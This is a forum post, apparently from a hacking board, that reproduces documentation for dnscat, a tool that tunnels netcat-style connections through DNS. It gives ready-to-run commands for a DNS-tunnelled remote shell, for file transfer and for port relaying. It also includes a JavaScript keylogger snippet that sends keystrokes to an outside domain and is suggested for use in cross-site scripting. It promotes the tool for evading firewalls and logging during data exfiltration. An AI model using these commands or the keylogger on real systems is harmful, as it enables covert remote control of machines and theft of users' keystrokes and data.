Jump to content
begood

[A+] From netcat to dnscat & web keylogger (js)

Recommended Posts

Posted (edited)

Intro

dnscat is designed in the spirit of netcat, allowing two hosts over the Internet to talk to each other. The major difference between dnscat and netcat, however, is that dnscat routes all traffic through the local (or a chosen) DNS server. This has several major advantages:

* Bypasses pretty much all network firewalls

* Bypasses many local firewalls

* Doesn't pass through the typical gateway/proxy and therefore is stealthy

There are a lot of advantages to using the DNS protocol. There are, of course, several disadvantages as well:

* Data has to be encoded into alpha-numeric (DNS allows letters (not case sensitive) and numbers)

* DNS is slow -- it's not a direct connection

* The possibility of annoying DNS providers with the amount of traffic being sent through them

* dnscat requires the listener to be an authoritative DNS server

The last point is very important. To actually receive DNS traffic, you require either:

1. An authoritative nameserver, preferably one that isn't being used for anything else. This is what I'll be assuming for the rest of the documentation (see the next section for far more information)

2. The ability to connect to the dnscat server on udp/53 from the client (use the --dns flag to set the address) -- this is far less interesting, but will be faster if it works

One of the key netcat-like components of dnscat is the -e (or --exec) argument, which runs a program (such as /bin/sh or cmd.exe) and redirects its input and output through the connection. The --exec flag can be used on the client or server.

dnscat has been tested on, in alphabetical order:

* FreeBSD 7.2

* FreeBSD 8.0

* FreeBSD 8.0 amd4

* Mac OS X 10.4 (I think)

* Slackware 13

* Slackware 13-64

* Windows 2000

* Windows 2003

* Windows XP

It should work on any modern version of Linux, FreeBSD, or Windows.

To start a dnscat server, use the following command line:

dnscat --listen

To start a dnscat client, use this command line:

dnscat --domain <domain>

For example:

dnscat --domain skullseclabs.org

You can also specify the DNS server to use, if the correct one wasn't chosen by using the --dns argument or if you don't have an authoritative nameserver and you want to make a direct UDP/53 connection:

dnscat --domain skullseclabs.org --dns 4.2.2.1

Remember that the server has to be the authoritative nameserver for the domain given by the client, unless the --dns entry points directly to the dnscat server.

For more options, use --help:

dnscat --help

Remote shell

Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:

dnscat --listen

And run the shell on the client side:

Linux/BSD:

dnscat --domain skullseclabs.org --exec "/bin/sh"

Windows:

dnscat.exe --domain skullseclabs.org --exec "cmd.exe"

On the server, you can now type commands and they'll run on the client side.

Transfer a file

You can transfer a file to the client from the server like this:

Server:

dnscat --listen > file.out

Client:

dnscat --domain <domain> < file.in

You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:

Server:

dnscat --listen < file.in

Client:

dnscat --domain <domain> > file.out

A couple things to note:

* No integrity checking is performed

* There is currently no indication when a transfer is finished

Tunnel another connection

This is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version.

Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100. The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver.

A diagram might help:


ssh client
|
| (port 1234 via netcat)
|
v
dnscat server
^
|
| (DNS server(s))
|
dnscat client
|
| (port 22 via netcat)
|
v
ssh server

It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud. :)

First, we start the netcat server. The server is going to run netcat, which listens on port 1234:

dnscat --listen --exec "nc -l -p 1234"

If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.

Second, on the client side, dnscat connects to 192.168.2.100 port 22:

dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22"

This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.

Third and finally, we ssh to our socket:

ssh -p 1234 ron@127.0.0.1

One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!

Web keylogger

There is an implementation of dnscat in Javascript (jsdnscat) written by Stefan Penner. It's located in the 'samples' folder of nbtool and conists of two libraries, one for keylogging and the other for dnscat. There are several example HTML files for using these, but it really comes down to these lines:

<script type='text/javascript' src='js/skullsecurity.all.min.js'></script>
<script type='text/javascript'>
SkullSecurity.jsdnscat.config.host = 'yourdomain.com';
SkullSecurity.keylogger.start(SkullSecurity.jsdnscat.send);
</script>

Equivalent code can easily be put into a .js file and hosted on your server for easy use with cross-site scripting.

The best reason for using this as opposed to traditional avenues for data exfiltration is to get around logging and firewalls -- because dnscat will respond with a localhost record to all A and AAAA requests, the computer doesn't actually send an HTTP request to the network, yet you still get its data.

Dnscat - Skull Security

download : Dnscat - Skull Security

jsdnscat : http://svn.skullsecurity.org:81/ron/security/nbtool-0.04/samples/jsdnscat/

Edited by begood

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...